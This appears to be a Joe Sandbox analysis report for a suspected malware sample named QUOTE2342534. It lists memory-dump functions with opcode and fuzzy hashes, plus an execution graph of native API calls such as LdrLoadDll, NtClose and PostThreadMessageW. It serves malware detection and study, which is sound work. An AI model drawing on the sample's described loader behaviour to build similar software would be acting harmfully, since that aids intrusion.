                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2140744983.0000000000C6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C6D000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_c6d000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 26ff38b836b799886c92846baa373daa7a2a32ddffd94e7e8be1098c0696edc8
                                                                                                                                                                                                                                                • Instruction ID: 00420f8e4d557f55c536cddb06e2c26631f934c7ded7df1596b68c88dff17e7d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 26ff38b836b799886c92846baa373daa7a2a32ddffd94e7e8be1098c0696edc8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1121F575A04244DFCB24DF24D5C4B26BF65FB88314F24C569E90A4B256C33BD807CAA1
                                                                                                                                                                                                                                                Function 00C6D005 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2140744983.0000000000C6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C6D000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_c6d000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 50db1db9ba8cc1888ba13afd20072254331748730010a434afc65e854944b928
                                                                                                                                                                                                                                                • Instruction ID: f773f043279c6551aef038c144649f02e04f123dc5fc436cb91d14bda570327f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 50db1db9ba8cc1888ba13afd20072254331748730010a434afc65e854944b928
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B3215E755093808FDB12CF24D9D4B15BF71EB46314F28C5EAD8498B6A7C33A990ACB62
                                                                                                                                                                                                                                                Function 00C5D3D3 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2140704451.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_c5d000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                                                                                                                                                                                • Instruction ID: 3bf3c78d6ac168233dc595f537484cee712c3a9bb1d17307159235371fba6097
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3C11CD76404340CFDB16CF00D5C4B16BF62FB94324F24C6A9DD4A0A256C33AE99ACBA2
                                                                                                                                                                                                                                                Function 00C6D1CF Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2140744983.0000000000C6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C6D000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_c6d000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                                                                                                                                                                                                • Instruction ID: 8c1b6d8f9eaafab8597da2a1cfdd959d793f9506ff7073b37fb26f2abcaa314c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2911BB75A04280DFCB22CF10C5D4B15BBA1FB84314F28C6A9D84A4B296C33AD84ACB62

                                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                                Function 089FD848 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: adf180db3bc6e1523918bd4e1596e1f7025c0aa49c5b4c38eb9f1ccab5fac6ef
                                                                                                                                                                                                                                                • Instruction ID: 3a8fd1ec5872fae6f6f9a16b90bf9b8afaffcbd547be945557d65da1a017f1de
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: adf180db3bc6e1523918bd4e1596e1f7025c0aa49c5b4c38eb9f1ccab5fac6ef
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8AE11B74E101198FCB14DFA8C5809AEFBF2FF89305F2481A9E558AB356D730A981CF60
                                                                                                                                                                                                                                                Function 089FBB80 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 7b9dacf4b0ab931fa8f6068e2953b5fed4394cac25eadbafc9daadd0a7f352f5
                                                                                                                                                                                                                                                • Instruction ID: dde5555d564bb09e60d12fd92a31875d69bcc0a87b40282b5d14fe25318d4dad
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7b9dacf4b0ab931fa8f6068e2953b5fed4394cac25eadbafc9daadd0a7f352f5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7DE11A74E001198FCB14DFA9C5809AEFBF2FF89315F2481A9E558AB356D730A981CF61
                                                                                                                                                                                                                                                Function 089F1C80 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 08ba95bd7edb2d193f7dbafb1f2be3e1a23a60ca1367e55f35c37170e269fa26
                                                                                                                                                                                                                                                • Instruction ID: 11b56a5a8788dda3302aef1affddd0ee739f86cbe971f091680f41c09bf2759c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 08ba95bd7edb2d193f7dbafb1f2be3e1a23a60ca1367e55f35c37170e269fa26
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9AE11974E01519CFCB15DFA8C5809AEFBB2FF89305F2481AAE515AB356C731A941CFA0
                                                                                                                                                                                                                                                Function 089F2E28 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 3505113ab4e76e2f09657c8b9783e232657a26e2702b6c5423c378d4a28481a8
                                                                                                                                                                                                                                                • Instruction ID: 9250e38c13714bc936b0abe72fd52f6558d71a8f409995363c97c5ad281f9902
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3505113ab4e76e2f09657c8b9783e232657a26e2702b6c5423c378d4a28481a8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F4E12A74E115198FCB15DFA8C5809AEFBF2FF89305F2482A9E514AB35AC730A941CF60
                                                                                                                                                                                                                                                Function 089FBFB8 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 436cb7f7fb9dfd8887ee6407d639b13366c5d22685ae6990198fa5c34bcb0dcc
                                                                                                                                                                                                                                                • Instruction ID: 69e317c55836ec0a4b9616850b5f23e9aa1e0644dece29a71d7396e260b9cc5d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 436cb7f7fb9dfd8887ee6407d639b13366c5d22685ae6990198fa5c34bcb0dcc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 86E1E774E001198FCB14DFA9C5809AEBBF2FF89305F24C1A9E555AB356D730A981CF61
                                                                                                                                                                                                                                                Function 089F20B8 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 6c6e8ccff5d68b982e9015028f27fcc5c889254eca8164bc5fdd512b15f829a5
                                                                                                                                                                                                                                                • Instruction ID: 9c377d10abae38ee078705be08ab34676ea2f69a6296b92a2a428ff0b61fc006
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6c6e8ccff5d68b982e9015028f27fcc5c889254eca8164bc5fdd512b15f829a5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 04E12B74E015198FCB19DFA8C580AAEFBF2FF89305F248169E514AB316D730A942CF61
                                                                                                                                                                                                                                                Function 089FD410 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: d48e39507c794d55f5510800064271921ed7ff7896bf068a19f5a2aa7dddd366
                                                                                                                                                                                                                                                • Instruction ID: 9666a2c5119b242642482e306288fed727dba95df303069cba3e8d327bf3d369
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d48e39507c794d55f5510800064271921ed7ff7896bf068a19f5a2aa7dddd366
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F8E10D74E011198FCB14DFA9C5809AEFBF2FF89305F2481A9E558AB35AD730A941CF61
                                                                                                                                                                                                                                                Function 089F2578 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 4b5208d5b5befaa9bb71e821525aca80f7d229b1560327cf8778d101e65b943e
                                                                                                                                                                                                                                                • Instruction ID: 09dedb5d018d1cad65219f8bd21c39090a0aa5c098f5484a9ba4c08304ef87db
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4b5208d5b5befaa9bb71e821525aca80f7d229b1560327cf8778d101e65b943e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8CE11974E015198FCB15DFA8C580AAEFBF2FF89305F24816AE514AB356D730A941CFA1
                                                                                                                                                                                                                                                Function 089FB748 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 15f06858c13899e7c4debf83038b10d97ed0206e82206e6e094981aa72196d27
                                                                                                                                                                                                                                                • Instruction ID: 1dcd49b1cb81367e78ed423f046b5243d19f8b812aa4b090e194a73b9fa6af20
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 15f06858c13899e7c4debf83038b10d97ed0206e82206e6e094981aa72196d27
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7FE1FB74E001198FCB14DFA9C5809AEFBF2FF89315F2481A9D558AB35AD730A981CF61
                                                                                                                                                                                                                                                Function 00EFD304 Relevance: .3, Instructions: 264COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2141400895.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_ef0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 3c2a46d593369a9b23a4d4762e80df3818fe454bf05472d848f60a16fad53102
                                                                                                                                                                                                                                                • Instruction ID: 690d2c84b45c937895a74049a8e957e92ca851b6ec5efa05578b311293f88d9f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3c2a46d593369a9b23a4d4762e80df3818fe454bf05472d848f60a16fad53102
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 31A15D36E102098FCF15DFA4C8405AEB7B2FF84304B1595BAE905BB266DB75E916CB40
                                                                                                                                                                                                                                                Function 089F52B0 Relevance: .2, Instructions: 169COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 1c24d1c2ae0eef698f6d49f023d42ecce6951ef277136bdfb45151d6b153a2d7
                                                                                                                                                                                                                                                • Instruction ID: 2ddd5239e2e596ac24187b0d21aefa905df200fb02b72278d916e02fd2627af2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c24d1c2ae0eef698f6d49f023d42ecce6951ef277136bdfb45151d6b153a2d7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BF718174E016198FCB08DFAAC5849DEFBF2BF88311F14C56AD418AB215D7749946CF50
                                                                                                                                                                                                                                                Function 089F1C70 Relevance: .1, Instructions: 132COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 8b1d13a75fadbbcaa60745ed68fc78c108d6a82dfe6715016e9c2fdf9f14697f
                                                                                                                                                                                                                                                • Instruction ID: 9577978163ce266df63b57f42f887c8abd7c0584065547e80067eccd8037a1c9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8b1d13a75fadbbcaa60745ed68fc78c108d6a82dfe6715016e9c2fdf9f14697f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF512A74E016198FCB15DFA9C5805AEFBF2FF89305F24C1AAD418AB216D7319942CFA1
                                                                                                                                                                                                                                                Function 089F52A2 Relevance: .1, Instructions: 131COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2155666599.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_89f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 423a7e431b636774f5d80ad2d2c8a4cc1afd9e1bff5918b2c7996bee32449bf9
                                                                                                                                                                                                                                                • Instruction ID: 02db617416498118ca63646a5372f552be3eb3f692c081e750af3275a9cb6a8c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 423a7e431b636774f5d80ad2d2c8a4cc1afd9e1bff5918b2c7996bee32449bf9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 88519F75E006198FDB08DFAAD98469EFBF2BF88301F14C06AD818AB315DB749946CB50

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:1.3%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:5.3%
                                                                                                                                                                                                                                                Signature Coverage:3.8%
                                                                                                                                                                                                                                                Total number of Nodes:132
                                                                                                                                                                                                                                                Total number of Limit Nodes:10
                                                                                                                                                                                                                                                execution_graph 93007 42f763 93008 42f773 93007->93008 93009 42f779 93007->93009 93012 42e683 93009->93012 93011 42f79f 93015 42c813 93012->93015 93014 42e69b 93014->93011 93016 42c830 93015->93016 93017 42c841 RtlAllocateHeap 93016->93017 93017->93014 93018 424c83 93021 424c9c 93018->93021 93019 424d29 93020 424ce4 93026 42e5a3 93020->93026 93021->93019 93021->93020 93024 424d24 93021->93024 93025 42e5a3 RtlFreeHeap 93024->93025 93025->93019 93029 42c863 93026->93029 93028 424cf4 93030 42c87d 93029->93030 93031 42c88e RtlFreeHeap 93030->93031 93031->93028 93140 42bad3 93141 42baed 93140->93141 93144 1762df0 LdrInitializeThunk 93141->93144 93142 42bb15 93144->93142 93145 4248f3 93146 42490f 93145->93146 93147 424937 93146->93147 93148 42494b 93146->93148 93150 42c4e3 NtClose 93147->93150 93149 42c4e3 NtClose 93148->93149 93151 424954 93149->93151 93152 424940 93150->93152 93155 42e6c3 RtlAllocateHeap 93151->93155 93154 42495f 93155->93154 93032 413a43 93035 42c773 93032->93035 93036 42c790 93035->93036 93039 1762c70 LdrInitializeThunk 93036->93039 93037 413a65 93039->93037 93040 413fa3 93041 413fbd 93040->93041 93046 4176e3 93041->93046 93043 413fd8 93044 41401d 93043->93044 93045 41400c PostThreadMessageW 93043->93045 93045->93044 93048 417707 93046->93048 93047 41770e 93047->93043 93048->93047 93049 417743 LdrLoadDll 93048->93049 93050 41775a 93048->93050 93049->93050 93050->93043 93156 41b213 93157 41b257 93156->93157 93158 41b278 93157->93158 93159 42c4e3 NtClose 93157->93159 93159->93158 93160 41e3f3 93161 41e419 93160->93161 93165 41e510 93161->93165 93166 42f893 93161->93166 93163 41e4b1 93164 42bb23 LdrInitializeThunk 93163->93164 93163->93165 93164->93165 93167 42f803 93166->93167 93168 42e683 RtlAllocateHeap 93167->93168 93171 42f860 93167->93171 93169 42f83d 93168->93169 93170 42e5a3 RtlFreeHeap 93169->93170 93170->93171 93171->93163 93051 401c64 93052 401c7e 93051->93052 93055 42fc33 93052->93055 93058 42e153 93055->93058 93059 42e179 93058->93059 93070 4074f3 93059->93070 93061 42e18f 93069 401ce9 93061->93069 93073 41b023 93061->93073 93063 42e1c3 93084 4281a3 93063->93084 93064 42e1ae 93064->93063 93088 42c8b3 93064->93088 93067 42e1dd 93068 42c8b3 ExitProcess 93067->93068 93068->93069 93072 407500 93070->93072 93091 4163a3 93070->93091 93072->93061 93074 41b04f 93073->93074 93109 41af13 93074->93109 93077 41b094 93080 42c4e3 NtClose 93077->93080 93082 41b0b0 93077->93082 93078 41b07c 93081 41b087 93078->93081 93115 42c4e3 93078->93115 93083 41b0a6 93080->93083 93081->93064 93082->93064 93083->93064 93085 428205 93084->93085 93087 428212 93085->93087 93123 418543 93085->93123 93087->93067 93089 42c8d0 93088->93089 93090 42c8e1 ExitProcess 93089->93090 93090->93063 93092 4163c0 93091->93092 93094 4163d6 93092->93094 93095 42cf53 93092->93095 93094->93072 93097 42cf6d 93095->93097 93096 42cf9c 93096->93094 93097->93096 93102 42bb23 93097->93102 93100 42e5a3 RtlFreeHeap 93101 42d015 93100->93101 93101->93094 93103 42bb3d 93102->93103 93106 1762c0a 93103->93106 93104 42bb69 93104->93100 93107 1762c11 93106->93107 93108 1762c1f LdrInitializeThunk 93106->93108 93107->93104 93108->93104 93110 41b009 93109->93110 93111 41af2d 93109->93111 93110->93077 93110->93078 93118 42bbc3 93111->93118 93114 42c4e3 NtClose 93114->93110 93116 42c4fd 93115->93116 93117 42c50e NtClose 93116->93117 93117->93081 93119 42bbdd 93118->93119 93122 17635c0 LdrInitializeThunk 93119->93122 93120 41affd 93120->93114 93122->93120 93124 418546 93123->93124 93130 418a6b 93124->93130 93131 413c23 93124->93131 93126 41868e 93127 42e5a3 RtlFreeHeap 93126->93127 93126->93130 93128 4186a6 93127->93128 93129 42c8b3 ExitProcess 93128->93129 93128->93130 93129->93130 93130->93087 93135 413c31 93131->93135 93133 413c9c 93133->93126 93134 413ca6 93134->93126 93135->93134 93136 41b333 RtlFreeHeap LdrInitializeThunk 93135->93136 93136->93133 93172 1762b60 LdrInitializeThunk 93137 418c88 93138 42c4e3 NtClose 93137->93138 93139 418c92 93138->93139

                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                Function 004176E3 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 423 4176e3-41770c call 42f2a3 426 417712-417720 call 42f8a3 423->426 427 41770e-417711 423->427 430 417730-417741 call 42dc23 426->430 431 417722-41772d call 42fb43 426->431 436 417743-417757 LdrLoadDll 430->436 437 41775a-41775d 430->437 431->430 436->437
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417755
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2231861338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Load
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2234796835-0
                                                                                                                                                                                                                                                • Opcode ID: 282508fb21bd17aca9df835b009d57495aa02ac7e438b1e4d569ef3af68b8a63
                                                                                                                                                                                                                                                • Instruction ID: 8fc80d6916356d0c54cf78bbd7535e2a4ae66fe1458a93b55015c8d7c175e8d1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 282508fb21bd17aca9df835b009d57495aa02ac7e438b1e4d569ef3af68b8a63
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3B015EB5E0020DABDB10EBE1DD42FDEB7789B14308F4041AAE91897280F635EB488B95
                                                                                                                                                                                                                                                Function 0042C4E3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 450 42c4e3-42c51c call 404873 call 42d733 NtClose
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C517
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2231861338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Close
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3535843008-0
                                                                                                                                                                                                                                                • Opcode ID: e9cdab559d7ec7bf5155d117a313f9e6409ac217aa759235a9e10d3125478c55
                                                                                                                                                                                                                                                • Instruction ID: 2e7f3fb3884b6e8e9fb0e7dcd219f262dbfc7f4d195fe0be80c2e43ff28bfd8d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e9cdab559d7ec7bf5155d117a313f9e6409ac217aa759235a9e10d3125478c55
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 30E086366002147BD260FB9AEC01FDB77ACDFC5710F40842AFA4867141CA74B90187F4
                                                                                                                                                                                                                                                Function 01762B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
